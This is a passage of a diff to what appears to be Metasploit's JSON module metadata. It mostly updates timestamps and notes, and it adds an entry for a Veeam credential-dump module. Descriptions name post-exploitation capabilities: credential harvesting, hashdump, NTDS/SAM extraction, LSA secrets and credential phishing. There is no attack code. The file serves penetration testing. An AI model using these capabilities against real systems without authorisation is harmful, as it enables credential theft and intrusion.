-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/sso.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/sso",
@@ -215303,7 +217812,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/steam.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/steam",
@@ -215567,7 +218076,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/tortoisesvn.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/tortoisesvn",
@@ -215603,7 +218112,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/total_commander.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/total_commander",
@@ -215640,7 +218149,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/trillian.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/trillian",
@@ -215654,6 +218163,51 @@
    ],
    "needs_cleanup": null
  },
+  "post_windows/gather/credentials/veeam_credential_dump": {
+    "name": "Veeam Backup and Replication Credentials Dump",
+    "fullname": "post/windows/gather/credentials/veeam_credential_dump",
+    "aliases": [
+
+    ],
+    "rank": 0,
+    "disclosure_date": "2022-11-22",
+    "type": "post",
+    "author": [
+      "npm <npm@cesium137.io>"
+    ],
+    "description": "This module exports and decrypts credentials from Veeam Backup & Replication and\n          Veeam ONE Monitor Server to a CSV file; it is intended as a post-exploitation\n          module for Windows hosts with either of these products installed. The module\n          supports automatic detection of VBR / Veeam ONE and is capable of decrypting\n          credentials for all versions including the latest build of 11.x.",
+    "references": [
+      "URL-https://blog.checkymander.com/red%20team/veeam/decrypt-veeam-passwords/"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-18 14:27:28 +0000",
+    "path": "/modules/post/windows/gather/credentials/veeam_credential_dump.rb",
+    "is_install_path": true,
+    "ref_name": "windows/gather/credentials/veeam_credential_dump",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null
+  },
  "post_windows/gather/credentials/viber": {
    "name": "Viber credential gatherer",
    "fullname": "post/windows/gather/credentials/viber",
@@ -215725,7 +218279,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/vnc.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/vnc",
@@ -215762,7 +218316,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/windows_autologin.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/windows_autologin",
@@ -215900,7 +218454,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/winscp.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/winscp",
@@ -215936,7 +218490,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/wsftp_client.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/wsftp_client",
@@ -216020,7 +218574,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/post/windows/gather/credentials/xshell_xftp_password.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/xshell_xftp_password",
@@ -216028,6 +218582,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": [
      "meterpreter"
@@ -216092,7 +218655,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/dumplinks.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/dumplinks",
@@ -216118,7 +218681,7 @@
    "author": [
      "Ben Campbell <ben.campbell@mwrinfosecurity.com>"
    ],
-    "description": "This module will enumerate BitLocker recovery passwords in the default AD\n        directory. This module does require Domain Admin or other delegated privileges.",
+    "description": "This module will enumerate BitLocker recovery passwords in the default AD\n          directory. This module does require Domain Admin or other delegated privileges.",
    "references": [
      "URL-https://technet.microsoft.com/en-us/library/cc771778%28v=ws.10%29.aspx"
    ],
@@ -216128,7 +218691,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/enum_ad_bitlocker.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_ad_bitlocker",
@@ -216164,7 +218727,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/enum_ad_computers.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_ad_computers",
@@ -216200,7 +218763,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/enum_ad_groups.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_ad_groups",
@@ -216226,7 +218789,7 @@
    "author": [
      "Stuart Morgan <stuart.morgan@mwrinfosecurity.com>"
    ],
-    "description": "This module will enumerate AD groups on the specified domain which are specifically managed.\n        It cannot at the moment identify whether the 'Manager can update membership list' option\n        option set; if so, it would allow that member to update the contents of that group. This\n        could either be used as a persistence mechanism (for example, set your user as the 'Domain\n        Admins' group manager) or could be used to detect privilege escalation opportunities\n        without having domain admin privileges.",
+    "description": "This module will enumerate AD groups on the specified domain which are specifically managed.\n          It cannot at the moment identify whether the 'Manager can update membership list' option\n          option set; if so, it would allow that member to update the contents of that group. This\n          could either be used as a persistence mechanism (for example, set your user as the 'Domain\n          Admins' group manager) or could be used to detect privilege escalation opportunities\n          without having domain admin privileges.",
    "references": [

    ],
@@ -216236,7 +218799,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/enum_ad_managedby_groups.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_ad_managedby_groups",
@@ -216263,7 +218826,7 @@
      "Ben Campbell <eat_meatballs@hotmail.co.uk>",
      "Scott Sutherland"
    ],
-    "description": "This module will enumerate servicePrincipalName in the default AD directory\n        where the user is a member of the Domain Admins group.",
+    "description": "This module will enumerate servicePrincipalName in the default AD directory\n          where the user is a member of the Domain Admins group.",
    "references": [
      "URL-https://www.netspi.com/blog/entryid/214/faster-domain-escalation-using-ldap"
    ],
@@ -216273,7 +218836,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/enum_ad_service_principal_names.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_ad_service_principal_names",
@@ -216299,7 +218862,7 @@
    "author": [
      "Thomas Ring"
    ],
-    "description": "This module will gather information from the default Active Domain (AD) directory\n        and use these words to seed a wordlist. By default it enumerates user accounts to\n        build the wordlist.",
+    "description": "This module will gather information from the default Active Domain (AD) directory\n          and use these words to seed a wordlist. By default it enumerates user accounts to\n          build the wordlist.",
    "references": [

    ],
@@ -216309,7 +218872,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/enum_ad_to_wordlist.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_ad_to_wordlist",
@@ -216335,7 +218898,7 @@
    "author": [
      "Ben Campbell <eat_meatballs@hotmail.co.uk>"
    ],
-    "description": "This module will enumerate user accounts in the default Active Domain (AD) directory which\n        contain 'pass' in their description or comment (case-insensitive) by default. In some cases,\n        such users have their passwords specified in these fields.",
+    "description": "This module will enumerate user accounts in the default Active Domain (AD) directory which\n          contain 'pass' in their description or comment (case-insensitive) by default. In some cases,\n          such users have their passwords specified in these fields.",
    "references": [
      "URL-http://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx"
    ],
@@ -216345,7 +218908,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/enum_ad_user_comments.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_ad_user_comments",
@@ -216383,7 +218946,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/enum_ad_users.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_ad_users",
@@ -216419,7 +218982,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-12-11 14:10:48 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/enum_applications.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_applications",
@@ -216549,7 +219112,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/enum_av_excluded.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_av_excluded",
@@ -216634,7 +219197,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-02-18 02:45:09 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/enum_chrome.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_chrome",
@@ -216670,7 +219233,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/enum_computers.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_computers",
@@ -216707,7 +219270,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/enum_db.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_db",
@@ -216733,7 +219296,7 @@
    "author": [
      "Brandon Perry <bperry.volatile@gmail.com>"
    ],
-    "description": "Enumerate PCI hardware information from the registry. Please note this script\n        will run through registry subkeys such as: 'PCI', 'ACPI', 'ACPI_HAL', 'FDC', 'HID',\n        'HTREE', 'IDE', 'ISAPNP', 'LEGACY'', LPTENUM', 'PCIIDE', 'SCSI', 'STORAGE', 'SW',\n        and 'USB'; it will take time to finish. It is recommended to run this module as a\n        background job.",
+    "description": "Enumerate PCI hardware information from the registry. Please note this script\n          will run through registry subkeys such as: 'PCI', 'ACPI', 'ACPI_HAL', 'FDC', 'HID',\n          'HTREE', 'IDE', 'ISAPNP', 'LEGACY'', LPTENUM', 'PCIIDE', 'SCSI', 'STORAGE', 'SW',\n          and 'USB'; it will take time to finish. It is recommended to run this module as a\n          background job.",
    "references": [

    ],
@@ -216743,7 +219306,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/enum_devices.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_devices",
@@ -216781,7 +219344,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/enum_dirperms.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_dirperms",
@@ -216956,7 +219519,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/enum_domain_users.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_domain_users",
@@ -216982,7 +219545,7 @@
    "author": [
      "mubix <mubix@hak5.org>"
    ],
-    "description": "This module enumerates currently the domains a host can see and the domain\n        controllers for that domain.",
+    "description": "This module enumerates currently the domains a host can see and the domain\n          controllers for that domain.",
    "references": [

    ],
@@ -216992,7 +219555,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-01-28 10:25:52 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/enum_domains.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_domains",
@@ -217028,7 +219591,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-02-22 18:47:46 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/enum_emet.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_emet",
@@ -217065,7 +219628,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-04-05 11:34:37 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/enum_files.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_files",
@@ -217183,7 +219746,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/enum_ie.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_ie",
@@ -217313,7 +219876,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/enum_muicache.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_muicache",
@@ -217349,7 +219912,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-01-29 10:17:48 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/post/windows/gather/enum_onedrive.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_onedrive",
@@ -217357,6 +219920,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": [
      "meterpreter"
@@ -217479,7 +220051,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/enum_prefetch.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_prefetch",
@@ -217562,7 +220134,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/enum_putty_saved_sessions.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_putty_saved_sessions",
@@ -217742,7 +220314,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/enum_termserv.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_termserv",
@@ -217813,7 +220385,7 @@
    "author": [
      "Barry Shteiman <barry@sectorix.com>"
    ],
-    "description": "This module will collect information from a Windows-based Apache Tomcat. You will get\n        information such as: The installation path, Tomcat version, port, web applications,\n        users, passwords, roles, etc.",
+    "description": "This module will collect information from a Windows-based Apache Tomcat. You will get\n          information such as: The installation path, Tomcat version, port, web applications,\n          users, passwords, roles, etc.",
    "references": [

    ],
@@ -217823,7 +220395,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/enum_tomcat.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_tomcat",
@@ -217859,7 +220431,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/enum_trusted_locations.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_trusted_locations",
@@ -217887,7 +220459,7 @@
      "sinn3r <sinn3r@metasploit.com>",
      "Ben Campbell <eat_meatballs@hotmail.co.uk>"
    ],
-    "description": "This module will check the file system for a copy of unattend.xml and/or\n        autounattend.xml found in Windows Vista, or newer Windows systems.  And then\n        extract sensitive information such as usernames and decoded passwords.",
+    "description": "This module will check the file system for a copy of unattend.xml and/or\n          autounattend.xml found in Windows Vista, or newer Windows systems.  And then\n          extract sensitive information such as usernames and decoded passwords.",
    "references": [
      "URL-http://technet.microsoft.com/en-us/library/ff715801",
      "URL-http://technet.microsoft.com/en-us/library/cc749415(v=ws.10).aspx",
@@ -217899,7 +220471,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-08-16 16:34:50 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/enum_unattend.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_unattend",
@@ -217937,7 +220509,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/post/windows/gather/exchange.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/exchange",
@@ -217945,6 +220517,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": [
      "meterpreter"
@@ -217973,7 +220554,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/file_from_raw_ntfs.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/file_from_raw_ntfs",
@@ -218009,7 +220590,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/forensics/browser_history.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/forensics/browser_history",
@@ -218046,7 +220627,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/forensics/duqu_check.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/forensics/duqu_check",
@@ -218082,7 +220663,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-04-05 11:34:37 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/forensics/enum_drives.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/forensics/enum_drives",
@@ -218119,7 +220700,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/post/windows/gather/forensics/fanny_bmp_check.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/forensics/fanny_bmp_check",
@@ -218127,6 +220708,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": [
      "meterpreter",
@@ -218156,7 +220746,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/forensics/imager.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/forensics/imager",
@@ -218192,7 +220782,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/forensics/nbd_server.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/forensics/nbd_server",
@@ -218228,7 +220818,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/forensics/recovery_files.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/forensics/recovery_files",
@@ -218309,7 +220899,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/hashdump.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/hashdump",
@@ -218347,7 +220937,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-01-18 15:08:30 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/local_admin_search_enum.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/local_admin_search_enum",
@@ -218383,7 +220973,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/lsa_secrets.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/lsa_secrets",
@@ -218409,7 +220999,7 @@
    "author": [
      "Stuart Morgan <stuart.morgan@mwrinfosecurity.com>"
    ],
-    "description": "This module will generate a CSV file containing all users and their managers, which can be\n        imported into Visio which will render it.",
+    "description": "This module will generate a CSV file containing all users and their managers, which can be\n          imported into Visio which will render it.",
    "references": [

    ],
@@ -218419,7 +221009,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/make_csv_orgchart.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/make_csv_orgchart",
@@ -218500,7 +221090,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/memory_grep.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/memory_grep",
@@ -218576,7 +221166,7 @@
    "author": [
      "Koen Riepe (koen.riepe <Koen Riepe (koen.riepe@fox-it.com)>"
    ],
-    "description": "This module uses a powershell script to obtain a copy of the ntds,dit SAM and SYSTEM files on a domain controller.\n                            It compresses all these files in a cabinet file called All.cab.",
+    "description": "This module uses a powershell script to obtain a copy of the ntds,dit SAM and SYSTEM files on a domain controller.\n          It compresses all these files in a cabinet file called All.cab.",
    "references": [

    ],
@@ -218586,7 +221176,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-08-20 12:16:26 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/ntds_grabber.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/ntds_grabber",
@@ -218658,7 +221248,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/outlook.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/outlook",
@@ -218695,7 +221285,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/phish_windows_credentials.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/phish_windows_credentials",
@@ -218733,7 +221323,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/psreadline_history.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/psreadline_history",
@@ -218769,7 +221359,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/resolve_sid.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/resolve_sid",
@@ -218809,7 +221399,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-07-25 14:51:37 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/screen_spy.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/screen_spy",
@@ -218845,7 +221435,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-08-20 12:16:26 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/smart_hashdump.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/smart_hashdump",
@@ -218881,7 +221471,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/tcpnetstat.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/tcpnetstat",
@@ -218917,7 +221507,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/usb_history.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/usb_history",
@@ -218953,7 +221543,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/win_privs.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/win_privs",
@@ -219034,7 +221624,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/word_unc_injector.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/word_unc_injector",
@@ -219070,7 +221660,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/post/windows/manage/add_user.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/add_user",
